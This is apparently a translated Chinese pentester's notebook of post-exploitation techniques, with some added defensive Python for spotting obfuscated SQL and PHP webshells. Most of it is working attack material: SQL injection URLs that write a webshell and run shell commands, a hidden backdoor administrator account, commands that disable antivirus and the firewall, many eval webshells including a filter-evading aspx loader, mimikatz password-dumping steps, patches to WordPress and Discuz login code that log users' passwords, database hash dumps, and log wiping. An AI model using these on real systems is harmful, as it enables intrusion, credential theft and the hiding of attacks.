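The split-string trick above gets past filters that look for xp_cmdshell in the raw text. As an added example, not code from the original post, the Python below folds runs of concatenated T-SQL literals back into a single literal, which is what EXEC() actually runs, and only then matches names. The payload it checks is the one on this page; the list of names to match is this page's, not an exhaustive one.

```python
import re

# One T-SQL string literal: single quotes, with '' as the escaped quote.
STRING_LIT = r"'(?:[^']|'')*'"
# Two or more literals joined with +, e.g. 'ma'+'ster..x'+'p_cm'
CONCAT_RUN_RE = re.compile(r"%s(?:\s*\+\s*%s)+" % (STRING_LIT, STRING_LIT))
LITERAL_RE = re.compile(STRING_LIT)

# Names this page uses; a real filter would carry its own list.
SUSPICIOUS = ("xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_addextendedproc",
              "xp_regread", "xp_dirtree", "openrowset")


def fold_concat(sql):
    """Join runs of 'a'+'b'+'c' into one literal 'abc', the text EXEC() will execute."""
    def join(m):
        pieces = LITERAL_RE.findall(m.group(0))
        return "'" + "".join(p[1:-1] for p in pieces) + "'"   # '' escapes stay as they are
    return CONCAT_RUN_RE.sub(join, sql)


def suspicious_names(sql):
    """Names present after folding; a check on the raw text misses the split form."""
    folded = fold_concat(sql).lower()
    return [name for name in SUSPICIOUS if name in folded]


if __name__ == "__main__":
    payload = "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')"
    print(fold_concat(payload))
    print(suspicious_names(payload))
```

This only undoes literal-to-literal concatenation. Strings built with CHAR(), comments wedged into names, or nvarchar arithmetic handed to sp_executesql need more, which is the usual argument that keyword filtering is not a defence: parameterised queries and an application login without sysadmin (so xp_cmdshell and sp_oacreate are simply unavailable) are.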
Some notes on PostgreSQL injection

Getting a webshell:
http://127.0.0.1/postgresql.php?id=1;create table fuck(shit text not null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy fuck(shit) to $$/tmp/test.php$$;
($$...$$ is dollar quoting, which avoids single quotes. COPY ... TO a file runs as the server process, so it needs a superuser (or pg_write_server_files on 11+) and the file ends up owned by the postgres user.)

Reading a file:
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

Running commands can be done two ways: through a user-defined function backed by libc (written "lic" on the page), or through PL/Python. Either way the PostgreSQL version has to be 8.x or later, and the injected user must be a superuser, since CREATE FUNCTION ... LANGUAGE C is superuser-only.

Create a system() function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, sending its output to a file:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the output back from the table to see whether it worked:
SELECT system_out FROM stdout

A test run:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC LIMIT 1),NULL LIMIT 1 OFFSET 1--

(The page's last line had the table and column swapped: the table is stdout and the column system_out. The LIMIT 1 inside the subquery keeps it to one row, so a command that printed several lines does not make the scalar subquery error out; the outer LIMIT 1 OFFSET 1 picks the UNION row.)
net stop sharedaccess    stops the built-in Windows firewall
netsh firewall show config    shows the firewall configuration
netsh firewall set notifications disable    turns off the pop-up shown when the firewall blocks a program
netsh firewall add allowedprogram c:\1.exe Svchost    adds a program to the firewall's allowed list (the last argument is the display name that appears in the list)
Changing the 3389 port (a non-default port is less likely to be picked up by scans)
Two places in the server's registry need changing:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber, default 3389; set it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber, default 3389; set it to the same port, e.g. 6000

That is all; reboot and the new port is live. (The page's copy had doubled backslashes and "TerminalServer" without the space; the key names are as shown here.)
A script that records 3389 remote logons
Save it as a .bat file (the trailing start Explorer suggests it is meant to run in place of the shell at logon, so each session appends an entry):

date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
      [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File>   the .rdp file to use for the connection
/v:<server[:port]>   the terminal server to connect to
/console   connect to the server's console session
/f   start the client in full-screen mode
/w:<width>   width of the remote desktop
/h:<height>   height of the remote desktop
/edit   open the given .rdp file for editing
/migrate   migrate legacy connection files created by Client Connection Manager to new .rdp files

mstsc /console attaches to session 0, the desktop shown on the physical screen, whereas plain mstsc opens a separate virtual session, which amounts to another logon to the machine. Try it; it is sometimes useful, especially with some software that
(On Vista/2008 and later /console was replaced by /admin.)
mstsc /console /v:124.42.126.xxx    gets around the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
(The name asp.net mimics the ASPNET service account; the UserList entry hides it from the welcome screen and attrib +h hides its profile folder.)
Upload form for FCKeditor's file manager with the Media type:
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2   opens the User Accounts dialog. (It lets you manage accounts and set automatic logon; contrary to what the page says, it does not show passwords.)
Shutting down McAfee: this needs SYSTEM, so run the commands through at or psexec -s cmd.exe.
You can upload .com files, e.g. nc.com, to get around McAfee's restriction on executables.
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager

VNC: online password cracker at http://tools88.com/safe/vnc.php
The VNC password can be pulled directly with vncdump, or from the command line by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]. (It is only obfuscated with fixed-key DES, not hashed, which is why it can be recovered at all.)
Running commands through MSSQL:
exec master..xp_cmdshell 'net user'

Getting the MSSQL password hashes (SQL Server 2000; on 2005 and later use sys.sql_logins as above):
select name,password from master.dbo.sysxlogins

Shrinking an MSSQL database:
backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
(NO_LOG and TRUNCATE_ONLY were removed in SQL Server 2008; there, switch the database to the SIMPLE recovery model before shrinking.)

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Packs game_db_201107170400.BAK into 1.rar as 200 MB volumes (-m0 stores without compressing, -ep1 drops the base directory from the stored paths).

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to D:\WebSites\game.com\UpFileList\game.bak, i.e. under the web root where it can then be downloaded.
% [/ p' e. w1 R' F9 PDiscuz!nt35渗透要点:0 o/ ]4 T/ ]: L6 ~
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default# V; j' }& S* g4 V( i
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>4 N. M# [) k y' f. V' o
(3)保存。
! N) r+ k8 V# m; j$ b1 K; U% U(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
& l% h% ^/ s5 a0 M* N% T; e% K2 Md:\rar.exe a -r d:\1.rar d:\website\2 `8 k* S; G/ E4 G- F
递归压缩website5 X4 X: c* v5 A% m* \% y4 J
注意rar.exe的路径1 e7 ^9 r7 v# ?. o0 Q: M
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: a one-line trojan inserted through an unfiltered config value.

Tip for dumping the database when the web and database servers are separated:
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
When constraints mean you cannot write a full shell and only have a one-liner, it is actually enough for anything you need, just not very convenient, e.g. for dumping the database.
What is used here is the client's expert mode (writing your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect operating system fingerprints

Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    identify the name servers and obtain DNS information
host -l www.owasp.org ns1.secure.net    try to request a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com  syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/  syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still non-public)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Running set names gb2312 first fixes the import error "Data too long for column 'username' at row 1", which is caused by the connection not supporting Chinese characters.

Changing a MySQL password:
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;

Advanced PHP one-line trojan backdoors
During intrusions I came across many advanced PHP one-liners. Recording them here so they can later be searched for and removed by keyword.
1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames (copies) any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner

5. include ($uid);
// dangerous include: compiles and runs any file as PHP, via POST

// one-liner embedded in a gif

6. Typical one-liners
Backdoor code:
<?php eval_r($_POST[sb])?>
Code:
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code:
<?php assert($_POST[sb]);?>
// run PHP statements through the expert mode of the lanker one-liner client
Code:
<?$_POST['sa']($_POST['sb']);?>
Code:
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code:
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// after deploying this one, enter the following in the "config" field when setting up the connection in the Caidao client:
Code:
<O>h=@eval_r($_POST[c]);</O>
Code:
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that gets around a filter on <?
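The post keeps these one-liners so they can later be hunted by keyword. As an added example (editor's code, not from the post), the following Python scanner turns the variants listed above into regex signatures plus a two-step taint check for include of a request-controlled variable, and runs them over constructed sample files; the sample file names and the rule names are assumptions.

```python
import re
from typing import Dict, List

REQUEST_VARS = r"\$_(?:POST|GET|REQUEST|COOKIE)"

# Signatures distilled from the one-liner variants listed above (rule names are the editor's).
SIGNATURES = {
    # eval($_POST[..]) / assert($_POST[..]); "eval_r" is how this forum renders eval(
    "eval_on_request": re.compile(r"\b(?:eval|assert)(?:_r)?\s*\(\s*" + REQUEST_VARS + r"\b", re.I),
    # preg_replace with the /e modifier: the replacement string is executed as PHP
    "preg_replace_e_modifier": re.compile(r"""preg_replace\s*\(\s*['"]/[^'"]*/[a-z]*e[a-z]*['"]""", re.I),
    # "p"."r"."e"."g"...: a function name assembled from single characters to dodge keyword scans
    "concatenated_function_name": re.compile(r"""(?:['"][a-z_]['"]\s*\.\s*){3,}['"][a-z_]['"]""", re.I),
    # $_POST['sa']($_POST['sb']): function name and argument both taken from the request
    "variable_function_from_request": re.compile(REQUEST_VARS + r"\s*\[[^\]]+\]\s*\(", re.I),
    # <script language="php"> used to evade a filter on the <? tag
    "php_script_tag": re.compile(r"""<script\s+language\s*=\s*['"]php['"]""", re.I),
}
# Two-step taint check for variant 2: $x = $_GET[..]; include($x);
ASSIGN_FROM_REQUEST = re.compile(r"\$(\w+)\s*=\s*" + REQUEST_VARS + r"\s*\[")
INCLUDE_VARIABLE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)", re.I)


def _line_of(source: str, offset: int) -> int:
    return source.count("\n", 0, offset) + 1


def scan_php(source: str) -> List[Dict[str, object]]:
    """Return one finding per signature hit: rule name, 1-based line, matched snippet."""
    findings = []
    for rule, pattern in SIGNATURES.items():
        for m in pattern.finditer(source):
            findings.append({"rule": rule, "line": _line_of(source, m.start()),
                             "snippet": m.group(0)[:60]})
    tainted = {m.group(1) for m in ASSIGN_FROM_REQUEST.finditer(source)}
    for m in INCLUDE_VARIABLE.finditer(source):
        if m.group(1) in tainted:
            findings.append({"rule": "include_from_request",
                             "line": _line_of(source, m.start()), "snippet": m.group(0)})
    return sorted(findings, key=lambda f: (f["line"], f["rule"]))


def rules_hit(source: str) -> List[str]:
    return sorted({str(f["rule"]) for f in scan_php(source)})


# Constructed sample files mirroring the variants in the post, plus one benign file.
SAMPLES = {
    "eval_post.php": "<?php @eval($_POST[sb])?>",
    "assert_post.php": "<?php assert($_POST[sb]);?>",
    "preg_e.php": "<?php\n@preg_replace(\"/[email]/e\",$_POST['h'],\"error\");\n?>",
    "concat.php": "<?php\n$hh = \"p\".\"r\".\"e\".\"g\".\"_\".\"r\".\"e\".\"p\".\"l\".\"a\".\"c\".\"e\";\n"
                  "$hh(\"/[discuz]/e\",$_POST['h'],\"Access\");\n",
    "varfunc.php": "<?$_POST['sa']($_POST['sb']);?>",
    "lfi.php": "<?php\n$filename=$_GET['xbid'];\ninclude ($filename);\n",
    "scripttag.php": "<script language=\"php\">@eval($_POST[sb])</script>",
    "clean.php": "<?php\n$name = htmlspecialchars($_POST['name']);\necho \"Hello \" . $name;\n",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        hits = scan_php(src)
        print(name, "->", ", ".join(f"{h['rule']}@L{h['line']}" for h in hits) or "clean")
```

Signature matching is a triage aid, not proof: treat every hit as a file to read by hand, and expect the concatenated-name rule to also fire on some legitimate obfuscated code.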

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Usage:
1. Go to the tools directory: psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Quit with exit; do not just close the window, otherwise the system crashes.

http://www.monyer.com/demo/monyerjs/  fairly comprehensive JS decoding site

Automatically check for missing high-risk system patches:
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

One-line aspx backdoor that gets past SafeDog:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell makes further social engineering easier.
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The logging code fires when action=login; you can of course also put it in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it directly below; the logged passwords end up in pwd.txt.
Actually, modifying wp-login.php is not a good approach: it is easily discovered. There are other methods; noting this for the record.

Using the IIS 6 file-parsing vulnerability to bypass SafeDog:
;antian365.asp;antian365.jpg

Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack the case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use the function fn_varbintohexstr() to cast the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser (usually called "postgres" or "pgsql") to read this table.
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396
Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored....
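Before any of these values is cracked, an incident responder first has to recognise which format a dumped credential is in, to judge what was exposed and which logins to reset. As an added example (editor's code, not from the post), the following Python splits the SQL Server pwdencrypt() layout described above into header, salt and hash fields and classifies the MySQL and PostgreSQL forms shown as well; the sample values are the ones quoted in the post, and the version labels and function names are the editor's.

```python
import re
from typing import Dict

# Sample values as quoted in the post above (the 2000 value was printed over two lines there).
MSSQL2000_SAMPLE = ("0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341"
                    "2FD54D6119FFF04129A1D72E7C3194F7284A7F3A")
MSSQL2005_SAMPLE = "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"
MYSQL_OLD_SAMPLE = "6f8c114b58f2ce9e"
MYSQL_NEW_SAMPLE = "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"
POSTGRES_SAMPLE = "md5fabb6d7172aadfda4753bf0507ed4396"


def normalise_hex(value: str) -> str:
    """Drop a 0x prefix (including the typographic '0×' that pasted output often carries)."""
    v = value.strip().replace("0×", "0x")
    if v[:2].lower() == "0x":
        v = v[2:]
    return v.upper()


def parse_mssql_hash(value: str) -> Dict[str, str]:
    """Split a SQL Server 2000/2005 pwdencrypt() value into the fields listed in the post."""
    hexstr = normalise_hex(value)
    if not re.fullmatch(r"[0-9A-F]+", hexstr) or not hexstr.startswith("0100"):
        raise ValueError("not a SQL Server password hash: expected a 0x0100 header")
    salt, body = hexstr[4:12], hexstr[12:]       # 2-byte header, 4-byte salt, then SHA-1 data
    if len(body) == 80:                          # SQL Server 2000: case-sensitive + upper-case SHA-1
        return {"version": "2000", "salt": salt,
                "case_sensitive_hash": body[:40], "upper_case_hash": body[40:]}
    if len(body) == 40:                          # SQL Server 2005: single case-sensitive SHA-1
        return {"version": "2005", "salt": salt, "case_sensitive_hash": body}
    raise ValueError(f"unexpected length: {len(hexstr) // 2} bytes")


def classify_db_hash(value: str) -> str:
    """Name the stored format of a dumped credential, or 'unknown' (raises on a malformed 0x value)."""
    v = value.strip()
    if v.startswith(("0x", "0X", "0×")):
        return "mssql-" + parse_mssql_hash(v)["version"]
    if v.startswith("md5") and re.fullmatch(r"[0-9a-f]{32}", v[3:]):
        return "postgres-md5"                    # md5(password + username) behind an 'md5' prefix
    if v.startswith("*") and re.fullmatch(r"[0-9A-F]{40}", v[1:]):
        return "mysql-4.1+"                      # '*' + double SHA-1, 41 characters
    if re.fullmatch(r"[0-9a-f]{16}", v):
        return "mysql-pre-4.1"                   # 16-character legacy PASSWORD() output
    return "unknown"


if __name__ == "__main__":
    for sample in (MSSQL2000_SAMPLE, MSSQL2005_SAMPLE, MYSQL_OLD_SAMPLE, MYSQL_NEW_SAMPLE, POSTGRES_SAMPLE):
        print(f"{classify_db_hash(sample):14s} {sample}")
    print(parse_mssql_hash(MSSQL2000_SAMPLE))
```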
Enabling xp_cmdshell in SQL Server 2005/2008:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the relevant entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission changes
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has "管理员取得所有权" (Take ownership as administrator); if it does not,

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

import the Win7 right-click "Take ownership as administrator" .reg file
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" files and four "notepad.exe.mui" files.
1. The "notepad.exe" under C:\Windows does not need replacing
2. The "notepad.exe" under C:\Windows\System32 does not need replacing
3. Leave the four "notepad.exe.mui" files alone
4. The ones to replace are the "notepad.exe" files under the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them, first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders;
after replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Turning off the security policy (UAC) in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
add the code below; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php under the ipdata directory to view the log; its password is falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);